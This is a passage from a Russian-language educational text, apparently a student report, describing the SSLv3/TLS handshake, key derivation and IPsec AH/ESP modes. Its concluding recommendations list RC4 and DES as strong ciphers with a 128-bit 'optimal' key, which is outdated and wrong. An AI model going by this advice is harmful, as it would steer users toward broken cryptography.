При использовании алгоритмов блочного шифрования после значения MAC можно добавлять заполнитель. Заполнитель состоит из некоторого числа байтов заполнителя, за которыми следует 1-байтовое значение, указывающее длину заполнителя. Для общей длины заполнителя выбирается наименьшее из значений, при котором общая длина последовательности данных, подлежащих шифрованию (открытый текст + MAC + заполнитель), будет кратна длине блока шифра.
Завершающим шагом в работе протокола записи SSL является создание заголовка, состоящего из следующих полей.
• Тип содержимого (8 битов). Определяет протокол лежащего выше уровня, с помощью которого должен обрабатываться данный фрагмент.
• Главный номер версии (8 битов). Указывает главный номер версии используемого протокола SSL. Для SSLv3 это поле содержит значение 3.
• Дополнительный номер версии (8 битов). Указывает дополнительный номер версии применяемого протокола SSL. Для SSLv3 это поле содержит значение 0.
• Длина сжатого фрагмента (16 битов). Длина в байтах данного фрагмента открытого текста (или сжатого фрагмента при сжатии). Максимально допустимое значение равно 2^14 + 2048.
Для типа содержимого определены значения change_cipher_spec, alert, handshake и application_data. Первые три значения обозначают протоколы стека SSL.
3. 3. Протокол изменения параметров шифрования
Протокол изменения параметров шифрования (Change Cipher Spec Protocol) генерирует однобайтовое сообщение, содержащее значение 1. Единственной задачей этого сообщения является указание начать копирование параметров состояния ожидания в текущее состояние, что приводит к обновлению комплекта шифров, используемых для данного соединения.
3. 4. Протокол извещения
Протокол извещения (Alert Protocol) предназначен для передачи другой участвующей в обмене данными стороне извещений, касающихся работы SSL. Как и данные любого другого приложения, использующего SSL, сообщения протокола извещения точно так же сжимаются и шифруются в соответствии с параметрами текущего состояния.
Сообщение, генерируемое данным протоколом состоит из 2-х байтов: первый байт - значение, обозначающее уровень предупреждения или уровень неустранимой ошибки, второй байт – код, обозначающий конкретный смысл извещения. Если в первом байте указан уровень неустранимой ошибки, то протокол SSL разрывает соединение, другие соединения могут продолжать существовать, но нового соединения для данного сеанса создать уже будет невозможно.
В протоколе извещения существует 5 извещений, указывающих на неустранимую ошибку и 7 извещений не указывающих на неустранимую ошибку.
3. 5. Протокол квитирования.
Этот протокол позволяет серверу и клиенту выполнить взаимную аутентификацию, а также согласовать алгоритмы шифрования, вычисления MAC и криптографические ключи, которые будут служить для защиты данных, пересылаемых в записи SSL. Протокол квитирования должен использоваться до начала пересылки данных прикладных программ.
В случае с протоколом квитирования генерируется несколько сообщений, которыми обмениваются клиент и сервер. Любое такое сообщение содержит три следующих поля.
• Тип (1 байт). Указывает один из 10 допустимых типов сообщения.
• Длина (3 байта). Длина сообщения в байтах.
• Содержимое (> 1 байта). Параметры, связываемые с сообщением данного типа.
В содержимом может находится несколько полей, в каждом из которых находятся элементы.
Этапы установления сеанса (session) между клиентом и сервером.
№ этапа
Client_helloТипы сообщений
Характеристика этапа
1
Server_hello
Определяется характеристика защиты, включая номер версии протокола, идентификатор сеанса, комплект шифров, метод сжатия и исходные случайные числа.
2
server_hello_done
certificate_request
server_key_exchange
certificate
Сервер может передать сертификат, сообщение обмена ключами и запрос сертификата. Сервер сигнализирует об окончании фазы приветственного сообщения.
3
Sertificate_verify
client_key_exchange
certificate
Клиент передаёт сертификат, если он был запрошен. Клиент передает сообщение обмена ключами. Клиент может передать сообщение верификации сертификата.
4
Change_cipher_spec
Change_cipher_spec
finished
finished
Смена комплекта шифров и завершение работы протокола квитирования
1-ый этап – определение характеристик защиты.
Процесс инициируется клиентом, который передаёт сообщение серверу client_hello, сервер отвечает сообщением server_hello с выбранными параметрами, которые доступны клиенту.
Тип сообщения: client-hello.
Название поля
Характеристика поля
Версия
Наивысший номер версии SSL, поддерживаемый клиентом.
Случайное значение
Генерируемая клиентом случайная структура, содержащая 32-битовую метку даты/времени и 28 байтов, полученных с помощью защищенного генератора случайных чисел. Эти значения используются в качестве оказий во время обмена ключами с целью защиты от атак воспроизведения.
Комплект шифров
Список, содержащий наборы криптографических алгоритмов, поддерживаемых клиентом, перечисленные в порядке убывания их приоритета. Каждый элемент списка (каждый комплект шифров) определяет алгоритм обмена ключами для схем традиционного шифрования, вычислений значений MAC и другие параметры шифрования. Сервер в server_hello должен определить какой-либо комплект шифров.
Метод сжатия
Список методов сжатия, поддерживаемых клиентом. Сервер в server_hello должен определить метод сжатии из доступных по списку.
Идентификатор сеанса
Идентификатор переменной длины для данного сеанса. Ненулевое значение говорит о намерении клиента обновить параметры имеющегося соединения или создать новое соединение в рамках того же сеанса. Нулевое значение вводится тогда, когда клиент намерен создать новое соединение в новом сеансе.
2-й этап – Аутентификация сервера и обмен ключами сервера.
Данный этап начинается с отправки сервером его сертификата, если требуется аутентификация сервера. Сообщение certificate (сертификат) требуется для любого из предлагаемых методов обмена ключами, кроме анонимного метода Диффи-Хеллмана. При использовании метода Диффи-Хеллмана с фиксированными параметрами это сообщение сертификации (certificate) выполняет функции сообщения обмена ключами (server_key_exchange), поскольку в нем содержатся предлагаемые сервером открытые параметры алгоритма Диффи-Хеллмана.
Затем при необходимости может быть отправлено сообщение server_key_exchange (обмен ключами сервера). Отправка такого сообщения не требуется в двух случаях: (1) когда сервер отправил сертификат для метода Диффи-Хеллмана с фиксированными параметрами или (2) когда предлагается использовать схему обмена ключами RSA. Сообщение server_key_exchange необходимо в случаях, когда используются следующие схемы.
• Анонимный метод Диффи-Хеллмана.
• Метод Диффи-Хеллмана с одноразовыми параметрами. Сообщение содержит такие же три параметра, как и в случае анонимного метода Диффи-Хеллмана, и еще подпись для этих параметров.
• Обмен ключами по схеме RSA, когда использующий RSA сервер имеет ключ RSA только для подписи.
• Fortezza.
После этого неанонимный сервер (т.е. сервер, не использующий анонимный метод Диффи-Хеллмана) может запросить сертификат клиента. Сообщение certificate_request (запрос сертификата) включает два параметра: certificate_type (тип сертификата, указывающий на применяемый алгоритм шифрования с открытым ключом) и certificate_authorities (центры сертификации). Центры сертификации - список имен допустимых центров сертификации.
Последним (и единственным обязательным) сообщением второго этапа является сообщение server_done, которым сервер извещает о завершении фазы приветствия сервера ввиду отправки им всех соответствующих сообщений. Это сообщение не имеет параметров. После отправки этого сообщения сервер переходит в режим ожидания ответа клиента.
3-й этап - Аутентификация клиента и обмен ключами клиента.
Получив сообщение server_done, клиент должен убедиться в том, что сервер предоставил действительный сертификат (если это требуется) и что параметры сообщения server_hello являются приемлемыми. Если проверка завершается успешно, клиент оправляет серверу следующие сообщения.
1. Если сервер запросил сертификат, клиент начинает данный этап с отправки серверу сообщения certificate. Если у клиента подходящего сертификата нет, клиент отправляет вместо него уведомление no_certificate (нет сертификата).
2. Следующим идет сообщение client_key_exchange (обмен ключами клиента), Содержимое этого сообщения зависит от выбранного метода обмена ключами и может быть следующим.
• RSA. Клиент генерирует 48-байтовый предварительный главный ключ и шифрует его с помощью открытого ключа из сертификата сервера или с помощью временного ключа RSA из сообщения server_key_exchange. Этот предварительный ключ позволяет вычислить главный ключ.
• Метод Диффи-Хеллмана с одноразовыми параметрами, или анонимный метод Диффи-Хеллмана. Отправляются открытые параметры клиента для метода Диффи-Хеллмана.
• Метод Диффи-Хеллмана с фиксированными параметрами. В данном случае открытые параметры клиента для метода Диффи-Хеллмана уже были отправлены в сообщении certificate, поэтому содержимое данного сообщения оказывается пустым.
• Fortezza. Отправляются параметры клиента для алгоритма Fortezza.
В завершение данного этапа клиент может отправить сообщение certificate_verify (проверка сертификата), чтобы обеспечить средства прямой верификации сертификата клиента. Это сообщение отправляется вслед за сертификатом клиента, поддерживающим подпись (т.е. вслед за любым сертификатом клиента, кроме тех, которые содержат параметры Диффи-Хеллмана с фиксированными параметрами). Сообщение включает подпись хэш-кода предыдущего сообщения.
4-ый этап – завершение создания защищённого соединения.
Клиент отправляет сообщение change_cipher_spec (изменение параметров шифрования) и копирует параметры шифрования из поля "комплект шифров" состояния ожидания в поле текущего состояния. Обратите внимание на то, что это сообщение не считается частью протокола квитирования, а отсылается в рамках протокола изменения параметров шифрования (Change Cipher Spec Protocol). В ответ клиент немедленно отправляет сообщение finished, шифрованное новым алгоритмом с новыми ключами и секретными значениями. Сообщение finished подтверждает, что процессы обмена ключами и аутентификации завершились успешно. Содержимое сообщения finished представляет собой результат конкатенации следующих двух значений хэш-кода.
MD5 (master_secret || pad_2 || MD5 (handshake_messages || Sender || master_secret || pad_l)),
SHA (master_secret || pad_2 || SHA (handshake_messages || Sender || master_secret || pad_l)),
где Sender - код, указывающий на то, что отправителем является клиент,
handshake_messages - все данные сообщений квитирования, за исключением данного сообщения.
master_secret – совместно применяемый главный секретный ключ, представляет собой однократно используемое 48-байтовое занчение (384 бита), генерируемое для данного сеанса в ходе защищённого обмена данными.
В ответ на эти два сообщения сервер посылает свое сообщение change_cipher_spec, переводит параметры шифрования состояния ожидания в текущее состояние и посылает свое сообщение finished. На этом процесс квитирования завершается, и теперь клиент и сервер могут начать обмен данными на уровне приложения.
3. 6. Создание главного секретного ключа.
Создание главного ключа состоит из двух этапов. На первом этапе согласуется значение предварительного главного ключа (pre_master_secret), а на втором обе стороны вычисляют значение главного ключа (master_secret). Для передачи друг другу значения pre_master_secret у сторон имеется два варианта.
• RSA. Генерируемый клиентом 48-байтовый ключ pre_master_secret шифруется с помощью открытого ключа RSA сервера и отправляется клиентом серверу. Сервер дешифрует полученный шифрованный текст с помощью своего личного ключа и восстанавливает значение pre_master_secret.
• Метод Диффи-Хеллмана. И клиент, и сервер генерируют открытые ключи для алгоритма Диффи-Хеллмана. После обмена этими ключами каждая сторона выполняет определенные вычисления по методу Диффи-Хеллмана, в результате которых получается совместно используемое значение pre_master_secret.
Теперь обе стороны могут вычислить значение master_secret по схеме:
master_secret = MD5 (pre_master_secret ||
SHA ('A' || pre_master_secret || ClientHello.random || ServerHello.random)) ||
MD5 (pre_master_secret ||
SHA ('BB' || pre_master_secret || ClientHello.random || Server Hello.random)) ||
MD5 (pre_master_secret ||
SHA ('CCC' || pre_master_secret || ClientHello.random || ServerHello.random)),
где ClientHello.random и ServerHello.random являются значениями оказий, входящих в оригинальные сообщения приветствия сторон (поле «случайное значение»).
3. 7. Генерирование криптографических параметров.
Для элемента “Параметры шифрования” поля “комплект шифров” требуются секретный ключ MAC клиента для записи, секретный ключ MAC сервера для записи, ключ клиента для записи, ключ сервера для записи, вектор инициализации клиента для записи и вектор инициализации сервера для записи. Все эти параметры генерируются из главного ключа путем применения функции хэширования к главному ключу с целью получения защищенной последовательности байтов достаточной длины.
Процедура генерирования ключей из главного ключа аналогична процедуре генерирования главного ключа из предварительного и показана ниже.
key_block = MD5 (master_secret ||
SHA ('A' || master_secret || ServerHello.random || ClientHello.random)) ||
MD5 (master_secret ||
SHA ('BB' || master_secret || Server Hello, random || ClientHello.random)) ||
MD5 (master_secret ||SHA('CCC' || master_secret || ServerHello.random || ClientHello.random)) || ...
Процедура выполняется до тех пор, пока не будет сгенерирована последовательность достаточной длины. Эта алгоритмическая структура представляет собой псевдослучайную функцию. Значение master_secret можно рассматривать как инициализирующее значение для этой функции. Сгенерированные клиентом и сервером случайные числа можно рассматривать как значения модификаторов (salt values), используемых с целью усложнения криптоанализа.
3. 8. Что такое TLS и его отличие от SSL.
Протокол TLS представляет собой результат инициативы IETF (Internet Engineering Task Force – проблемная группа проектирования Internet), целью которой является разработка стандарта SSL для Internet. Текущая версия проекта стандарта TLS очень похожа на SSLv3. Рассмотрим различия между TLS и SSLv3.
Схемы вычислений значений MAC этих протоколов отличаются по двум параметрам: применяемому алгоритму и области данных, для которых вычисляется значение кода аутентичности сообщения.
В TLS применяется PRF функция. PRF функция служит для получения небольшого по длине секретного значения, которое служит для генерирования более длинных блоков данных (используя специальную схему расширения данных где использован алгоритм HMAC), защищённых от атак на функции хэширования и вычисления значений кода аутентичности сообщения. Секретное значение получается путём использования той же схемы расширения данных, но с алгоритмом MD5 или SHA.
В TLS не извещения no_certificate, но определён ряд дополнительных кодов извещения (их всего 12, 9 из которых означают неустранимую ошибку).
В TLS включены все алгоритмы симметричной схемы шифрования, за исключением Fortezza.
Сообщение finished в TLS представляет собой хэш-код, вычисленный c помощью master_secret, предыдущих сообщений и метки, идентифицирующей клиент и сервер. Схема вычисления сообщения finished отличается от схемы, используемой в SSLv3. В TLS схемы выглядит так: PRF (master_secret, finished_label, MD5 (handshake_meassages) || SHA-1 (handshake_messages)), где
finished_label – строка «client finished» для клиента и «server_finished» для сервера.
Схема вычисления master_secret для TLS иная чем в SSLv3.
В SSL байты заполнителя добавляются к данным пользователя, подлежащим шифрованию, минимально необходимом количестве, достаточном для того, чтобы получить общую длину данных для шифрования, кратную длине блока шифра. В случае TLS разрешается добавлять любое число заполнителей (до 255 байтов включительно), лишь бы в результате длина блока данных получилась кратной длине блока шифра.
4. Защита на уровне IP (сетевой уровень).
4. 1. Архитектура защиты на уровне IP
IPSec обеспечивает сервис защиты на уровне IP, позволяя системе выбрать необходимые протоколы защиты, определить алгоритм (алгоритмы) для соответствующего сервиса (сервисов) и задать значения любых криптографических ключей, требуемых для запрошенного сервиса. Для защиты используется два протокола: протокол аутентификации, указанный заголовком данного протокола (заголовком аутентификации АН), и комбинированный протокол шифрования/аутентификации, определенный форматом пакета для этого протокола (протокола ESP). В данном случае обеспечиваются следующие виды сервиса:
• контроль доступа;
• целостность без установления соединений;
• аутентификация источника данных;
• отторжение воспроизведенных пакетов (форма целостности последовательностей);
• конфиденциальность (шифрование);
• ограниченная конфиденциальность транспортного потока.
В случае ESP есть два варианта: с использованием и без использования опции аутентификации. Как АН, так и ESP имеют возможности контроля доступа, основанного на распределении криптографических ключей и управлении транспортными потоками, относящимися к этим протоколам защиты.
Вид сервиса
AH
ESP (только шифрование)
ESP (шифрование и аутентификация)
Контроль доступа
Целостность без установления соединений
Аутентификация источника данных
Отторжение воспроизведенных пакетов
Конфиденциальность
Ограниченная конфиденциальность транспортного потока
Ключевым объектом в механизмах аутентификации и конфиденциальности для IP является защищенная связь (Security Association). Связь представляет собой одностороннее отношение между отправителем и получателем, применяющим сервис защиты к транспортному потоку. Сервис защиты предоставляет возможность для защищенной связи использовать либо АН, либо ESP, но никак не обе эти возможности одновременно.
В любом пакете IP защищенная связь однозначно идентифицируется адресом пункта назначения в заголовке IPv4 или IPv6 и индексом параметров защиты (даёт возможност ьвыбрать защищённую связь по которой должен обрабатываться полученный пакет) во вложенном заголовке расширения (АН или ESP).
Заголовки АН и ESP поддерживают два режима использования: транспортный и туннельный. Дадим краткий обзором этих режимов.
Транспортный режим.
Транспортный режим обеспечивает защиту прежде всего для протоколов высшего уровня. Это значит, что защита транспортного режима распространяется на полезный груз пакета IP. Примеры включают сегмент TCP или UDP, или пакет протокола ICMP , которые размещаются непосредственно над IP в стеке главного протокола. Когда система использует заголовки АН или ESP над IPv4, полезным грузом являются данные, обычно размещаемые сразу после заголовка IP. Для IPv6 полезным грузом являются данные, обычно следующие после заголовка IP и всех имеющихся заголовков расширений IPv6, за возможным исключением заголовка параметров адресата, который тоже может подлежать защите.
ESP в транспортном режиме шифрует и, если нужно, идентифицирует полезный груз IP, но не заголовок IP. АН в транспортном режиме идентифицирует полезный груз IP и некоторые части заголовка IP.
Туннельный режим.
Туннельный режим обеспечивает защиту всего пакета IP. После добавления к пакету IP полей АН или ESP весь пакет, вместе с полями защиты, рассматривается как полезный груз некоторого нового "внешнего" пакета IP с новым внешним заголовком IP. Весь оригинальный, или внутренний, пакет при этом пересылается через "туннель" от одной точки сети IP к другой, и ни один из маршрутизаторов на пути не может проверить внутренний заголовок IP. Ввиду того что оригинальный пакет инкапсулирован в новый, больший пакет может иметь совершенно другие адреса источника и адресата, что усиливает защиту. Туннельный режим используется тогда, когда один или оба конца защищенной связи являются шлюзами защиты, например брандмауэрами или маршрутизаторами, которые основаны на IPSec. При использовании туннельного режима системы в сетях за брандмауэрами могут осуществлять защищенный обмен данными без применения IPSec. Незащищенные пакеты, генерируемые такими системами, связываются по туннелям, проложенным через внешние сети с помощью туннельного режима защищенной связи, установленного программным обеспечением IPSec в брандмауэре или защищенном маршрутизаторе на границе локальной сети.
Функциональные возможности транспортного и туннельного режимов
Вид заголовка
Транспортный режим защищенной связи
Туннельный режим защищенной связи
АН
Идентифицирует полезный груз IP, а также отдельные части заголовка IP и заголовков расширений IPv6
Идентифицирует весь внутренний пакет IP (заголовок и полезный груз внутреннего пакета IP), а также отдельные части внешнего заголовка IP и внешних заголовков расширений IPv6
ESP
Шифрует полезный груз IP и все заголовки расширений IPv6, следующие за заголовком ESP
Шифрует внутренний пакет IP
ESP с аутентификацией
Шифрует полезный груз IP и все заголовки расширений IPv6, следующие за заголовком ESP.
Идентифицирует полезный груз IP, но не заголовок IP
Шифрует внутренний пакет IP. Идентифицирует внутренний пакет IP
4. 2. Заголовок аутентификации (AH).
4. 2. 1. Структура заголовка.
Заголовок аутентификации (АН) обеспечивает поддержку целостности данных и аутентификации пакетов IP. Свойство целостности данных гарантирует невозможность незаметной модификации содержимого пакета в пути следования. Функция аутентификации дает возможность конечной системе или сетевому устройству идентифицировать пользователя или приложение и соответственно отфильтровать трафик, а также защититься от очень распространенных сегодня в Internet атак с подменой сетевых адресов. Заголовок АН также защищает от атак воспроизведения сообщений.
Заголовок аутентификации состоит из следующих полей
Следующий заголовок
Длина полезного груза
Зарезервировано
Индекс параметров защиты
Порядковый номер
Данные аутентификации (переменой длины)
Заголовок аутентификации IPSec.
Следующий заголовок. Идентифицирует тип заголовка, следующего непосредственно за данным заголовком
Длина полезного груза (8 битов). Длина заголовка аутентификации в 32-битовых словах, уменьшенная на 2.
Зарезервировано (16 битов). Для будущего использования.
Индекс параметров защиты (32 бита). Идентифицирует защищенную связь.
Порядковый номер (32 бита). Значение счетчика, для сервиса защиты от воспроизведения
Данные аутентификации (переменной длины). Поле переменной длины , содержащее MAC для данного пакета.
Атаки воспроизведения сообщений заключаются в том, что противник может получить экземпляр удостоверенного пакета и позже предъявить его предполагаемому адресату. Повторное получение одинаковых удостоверенных пакетов IP может каким-то образом нарушить сервис или иметь какие-то другие нежелательные последствия.
4. 2. 2. Использование AH в транспортном и туннельном режиме.
В этом подразделе мы рассмотрим область применения аутентификации, обеспечиваемой с помощью протокола АН, и размещение заголовка аутентификации в каждом из двух режимов. При этом случаи IPv4 и IPv6 несколько различаются.
Для транспортного режима АН с применением IPv4 данные АН размещаются непосредственно после оригинального заголовка IP и перед полезным грузом IP (например, сегментом TCP). Аутентификации подлежит весь пакет, за исключением изменяемых полей в заголовке IPv4, которые обнуляются для вычисления значения MAC.
Удостоверяется за исключением изменяемых полей
Оригинальный заголовок IP
AH
TCP
Данные
Удостоверяется за исключением изменяемых полейВ контексте IPv6 данные АН рассматриваются как полезный груз сквозной передачи; т.е. проверка и обработка этих данных промежуточными маршрутизаторами не предполагается. Поэтому данные АН размещаются после базового заголовка IPv6 и заголовков расширений транзита, маршрутизации и фрагментации. Заголовок расширения параметров адресации может размещаться до или после заголовка АН — в зависимости от требований семантики. Опять же, аутентификация предполагается для всего пакета, за исключением изменяемых полей, которые обнуляются для вычисления значения MAC.
Оригинальный заголовок IP
Транзит, адресация, маршрутизация, фрагментация
AH
Адресация
TCP
Данные
Для туннельного режима АН удостоверяется весь оригинальный пакет IP, a заголовок АН вставляется между оригинальным заголовком IP и новым внешним заголовком IP. Внутренний заголовок IP несет адреса оригинальных источника и адресата, в то время как внешний заголовок IP может содержать совершенно другие адреса IP (например, адреса брандмауэров или других шлюзов защиты).
В туннельном режиме весь внутренний пакет IP, включая весь внутренний заголовок IP, защищается средствами АН. Внешний заголовок IP (а в случае IPv6 и внешние заголовки расширений IP) защищается с исключением изменяемых и непрогнозируемых по значению полей.
Удостоверяется за исключением изменяемых полей в новом заголовке IP
Новый заголовок IP
AH
Оригинальный заголовок IP
TCP
Данные
Удостоверяется за исключением изменяемых полей в новом заголовке IP и его заголовках расширенийIPv4
Новый заголовок IP
Заголовки расширений
AH
Оригинальный заголовок IP
Заголовки расширений
TCP
Данные
IPv6
4. 3. Протокол ESP.
4. 3. 1. Формат пакета ESP
Поля пакета ESP.
• Индекс параметров защиты (32 бита). Идентифицирует защищенную связь.
• Порядковый номер (32 бита). Значение счетчика, обеспечивающее функцию защиты от воспроизведения, как и в случае для АН.
• Полезный груз (переменной длины). Это сегмент транспортного уровня (в транспортном режиме) или пакет IP (в туннельном режиме), который защищается шифрованием.
• Заполнитель (0-255 байтов).
• Длина заполнителя (8 битов). Указывает число байтов заполнителя, непосредственно предшествующего данному полю.
• Следующий заголовок (8 битов). Идентифицирует тип данных, содержащихся в поле данных полезного груза, с помощью идентификации первого заголовка этого полезного груза (например, заголовка расширения IPv6 или протокола верхнего уровня, такого как TCP).
• Данные аутентификации (переменной длины). Поле переменной длины , содержащее код ICV (Integrity Check Value — код контроля целостности), вычисляемый для всего пакета ESP без поля данных аутентификации.
Индекс параметров защиты
Порядковый номер
Данные полезного груза
Заполнитель (0-255 байт)
Длина заполнителя
Следующий заголовок
Данные аутентификации (переменной длины)
Поле заполнителя предназначено для следующих целей.
• Если алгоритм шифрования требует, чтобы длина открытого текста была кратна некоторому целому числу байтов (например, длине одного блока блочного шифра), поле заполнителя служит для того, чтобы дополнить открытый текст (складывающийся из полей полезного груза, заполнителя, длины заполнителя и следующего заголовка) до нужной длины.
• Формат ESP требует, чтобы поля длины заполнителя и следующего заголовка были выровнены по правому краю в 32-битовом слове. Это эквивалентно требованию, чтобы шифрованный текст имел длину, кратную 32 битам. Поле заполнителя предназначено для того, чтобы осуществить такое выравнивание.
• Дополнительное заполнение можно использовать тогда, когда требуется обеспечить частичную конфиденциальность для транспортного потока, чтобы скрыть истинную длину полезного груза.
4. 3. 2. Шифрование и алгоритмы аутентификации.
Сервис ESP предполагает шифрование полей полезного груза, заполнителя, длины заполнителя и следующего заголовка.
Имеющиеся на сегодня спецификации требуют, чтобы любая реализация поддерживала использование алгоритма DES в режиме СВС (режим сцепления шифрованных блоков. Другие алгоритм которые могут применяться для сервиса ESP:
• "тройной" DES с тремя ключами,
• RC5,
• IDEA,
• "тройной" IDEA с тремя ключами,
• CAST,
• Blowfish.
Как и АН, протокол ESP поддерживает использование значений MAC длиной по умолчанию 96 битов. Так же как и в случае с АН, имеющиеся сегодня спецификации требуют, чтобы любая реализация поддерживала схемы HMAC-MD5-96 и HMAC-SHA-1-96.
4. 3. 3. Транспортный режим ESP.
Транспортный режим ESP служит для шифрования и, если нужно, аутентификации данных, пересылаемых по протоколу IP (например, сегмента TCP). Для этого режима в случае с IPv4 заголовок ESP размещается в пакете IP непосредственно перед заголовком транспортного уровня (например, TCP, UDP, ICMP), а концевик (trailer) пакета ESP (содержащий поля заполнителя, длины заполнителя и следующего заголовка) размещается после пакета IP; если же используется функция аутентификации, то поле данных аутентификации ESP добавляется после концевика ESP. Весь сегмент транспортного уровня вместе с концевиком ESP шифруются. Аутентификация охватывает весь шифрованный текст и заголовок ESP.
Удостоверяется
Шифруется
Оригинальный заголовок IP
Заголовок ESP
TCP
Данные
Концевик ESP
Аутентификатор ESP
В контексте IPv6 данные ESP рассматриваются как предназначенный для сквозной пересылки полезный груз, не предполагающий проверку или обработку промежуточными маршрутизаторами. Поэтому заголовок ESP размещается после основного заголовка IPv6 и заголовков расширений транзита, маршрутизации и фрагментации. Заголовок расширения параметров адресата может быть помещен до или после заголовка ESP — в зависимости от требований семантики. В случае IPv6 шифрование охватывает весь сегмент транспортного уровня вместе с концевиком ESP, а также заголовок расширения параметров адресата, если этот заголовок размещается после заголовка ESP. Аутентификация предполагается для шифрованного текста и заголовка ESP.
Удостоверяется
Шифруется
Оригинальный заголовок IP
Транзит, адресация, маршрутизация, фрагментация
Заголовок ESP
адресация
TCP
Данные
Концевик ESP
Аутентификатор ESP
В транспортном режиме выполняются следующие операции:
1. В узле источника блок данных, состоящий из концевика ESP и всего сегмента транспортного уровня, шифруется, а открытый текст этого блока заменяется шифрованным текстом, что формирует пакет IP для пересылки. Если выбрана опция аутентификации, то добавляется поле аутентификации.
2. Затем пакет направляется адресату. Каждый промежуточный маршрутизатор должен проверить и обработать заголовок IP, а также все заголовки расширений IP, доступные в нешифрованном виде. Шифрованный текст при этом остается неизменным.
3. Узел адресата проверяет и обрабатывает заголовок IP и все заголовки расширений IP, доступные в нешифрованном виде. Затем на основе информации индекса параметров защиты в заголовке ESP дешифруются остальные части пакета, в результате чего становится доступным сегмент транспортного уровня в виде открытого текста.
Использование транспортного режима обеспечивает конфиденциальность для любого применяющего этот режим приложения, что позволяет избежать необходимости реализации функций обеспечения конфиденциальности в каждом отдельном приложении. Этот режим достаточно эффективен, а объем добавляемых к пакету IP данных при этом невелик. Недостатком этого режима является то, что при его использовании не исключается возможность анализа трафика пересылаемых пакетов.
4. 3. 4. Туннельный режим ESP.
Туннельный режим ESP предназначен для шифрования всего пакета IP. Для этого режима заголовок ESP добавляется к пакету как префикс, а затем такой пакет вместе с концевиком ESP шифруются. Данный метод можно использовать, когда требуется исключить возможность атак, построенных на анализе трафика.
Ввиду того что заголовок IP содержит адрес пункта назначения и, возможно, директивы исходной маршрутизации вместе с информацией о параметрах транзита, нельзя просто передать шифрованный пакет IP с добавленным к нему в виде префикса заголовком ESP. Промежуточные маршрутизаторы не смогут обработать такой пакет. Таким образом, необходимо включить весь блок (заголовок ESP, шифрованный текст и данные аутентификации, если они есть) во внешний пакет IP с новым заголовком, который будет содержать достаточно информации для маршрутизации, но не для анализа трафика.
Удостоверяется
Шифруется
Новый заголовок IP
Заголовок ESP
Оригинальный заголовок IP
TCP
Данные
Концевик ESP
Аутентификатор ESP
IPv4
Удостоверяется
Шифруется
Новый заголовок IP
Заголовки расширений
Заголовок ESP
Оригинальный заголовок IP
Заголовок расширений
TСP
Данные
Концевик ESP
Аутентификатор ESP
IPv6
В то время как транспортный режим подходит для защиты соединений между узлами, поддерживающими сервис ESP, туннельный режим оказывается полезным в конфигурации, которая предполагает наличие брандмауэра или иного шлюза защиты, предназначенного для защиты надежной внутренней сети от внешних сетей. В случае с туннельным режимом шифрование используется для обмена только между внешним узлом и шлюзом защиты или между двумя шлюзами защиты. Это разгружает узлы внутренней сети, избавляя их от необходимости шифрования данных, и упрощает процедуру распределения ключей, уменьшая число требуемых ключей. Кроме того, такой подход усложняет проблему анализа потока сообщений, направляемых конкретному адресату.
Рассмотрим случай, когда внешний узел соединяется с узлом внутренней сети, защищенной брандмауэром, и когда ESP используется внешним узлом и брандмауэром. Тогда при пересылке сегмента транспортного уровня от внешнего узла к узлу внутренней сети будут выполнены следующие действия.
1. Источник готовит внутренний пакет IP с указанием адреса пункта назначения, являющегося узлом внутренней сети. К этому пакету в виде префикса добавляется заголовок ESP. Затем пакет и концевик ESP шифруются и к результату могут быть добавлены данные аутентификации. Полученный блок заключается во внешний пакет IP с новым заголовком IP (базовый заголовок плюс необязательные расширения, например параметров маршрутизации и транзита для IPv6), в котором адресом пункта назначения является адрес брандмауэра.
2. Внешний пакет отправляется брандмауэру. Каждый промежуточный маршрутизатор нужно проверить и обработать внешний заголовок IP и все внешние заголовки расширений IP, оставив шифрованный текст неизменным.
3. Брандмауэр-адресат проверяет и обрабатывает внешний заголовок IP и все внешние заголовки расширений IP. Затем на основе информации индекса параметров защиты в заголовке ESP брандмауэр дешифрует остальные части пакета, в результате чего становится доступным внутренний пакет IP в виде открытого текста. Этот пакет потом передается по внутренней сети.
4. Внутренний пакет направляется через маршрутизаторы внутренней сети или непосредственно к узлу-адресату.
4. 4. Комбинация защищённых связей.
Отдельная защищенная связь может использовать либо протокол АН, либо ESP, но никак не оба эти протокола одновременно. Тем не менее, иногда конкретный поток обмена данными может требовать и сервиса АН, и сервиса ESP. Кроме того, конкретному потоку обмена данными может понадобиться сервис IPSec для связи между главными узлами и другой сервис для связи между шлюзами защиты, например брандмауэрами. Во всех этих случаях одному потоку для получения всего комплекса услуг IPSec требуется несколько защищенных связей. Здесь вводится понятие пучка защищенных связей (security association bundle), обозначающее набор защищенных связей, посредством которых потоку должно предоставляться необходимое множество услуг IPSec. При этом защищенные связи в пучке могут завершаться в различных конечных точках.
Защищенные связи могут быть объединены в пучки следующими двумя способами.
Транспортная смежность. Применение более одного протокола защиты к одному пакету IP без туннелирования. Этот подход к созданию комбинации АН и ESP оказывается эффективным только для одного уровня вложения: дальнейшие вложения не дают дополнительного выигрыша, поскольку обработка выполняется в одной инстанции — IPsec (конечного) получателя.
Повторное туннелирование. Применение нескольких уровней протоколов защиты с помощью туннелирования IP. Этот подход допускает множество уровней вложения, поскольку туннели могут начинаться и завершаться в разных использующих IPsec узлах сети вдоль маршрута передачи данных.
Эти два подхода можно объединить (например, организовав в части туннельной защищенной связи между шлюзами защиты транспортную защищенную связь между находящимися на пути узлами).
Заключение.
Исходя из рассмотренных уровней защиты потока данных в Web и архитектуры построения сети на основе стека TCP/IP был произведён обзор стандартов, существующих в настоящее время и обеспечивающих надёжную передачу данных (по e-mail), если используемое нами программное и аппаратное обеспечение поддерживает комплекс требований, изложенных в этих стандартах.
Итак, рекомендуемые меры и средства для защиты электронной переписки:
Сильные средства аутентификации, например, технология двухфакторной аутентификации.
Эффективное построение и администрирование сети. Речь идет о построении коммутируемой инфраструктуры, мерах контроля доступа и фильтрации исходящего трафика, закрытии «дыр» в программном обеспечении с помощью модулей- «заплаток» и регулярном его обновлении, установке антивирусных программ и многом ином.
Криптографию, основанную на сильных криптоалгоритмах (Симметричные - RC4, RC5, CAST, DES, AES, оптимальная длина ключа которых = 128 разрядов, ассиметричные - RSA, Diffie-Hellman и El-Gamal, оптимальная длина которых 2048 разряда.
Если криптографический алгоритм, используемый в системе достаточно стоек, а генератор случайных чисел, используемый для создания ключей, никуда не годится, любой достаточно опытный криптоаналитик в первую очередь обратит своё внимание именно на него.
Если удалось улучшить генератор, но ячейки компьютера не защищены, после того как в них побывал сгенерированный ключ, грош цена такой безопасности.
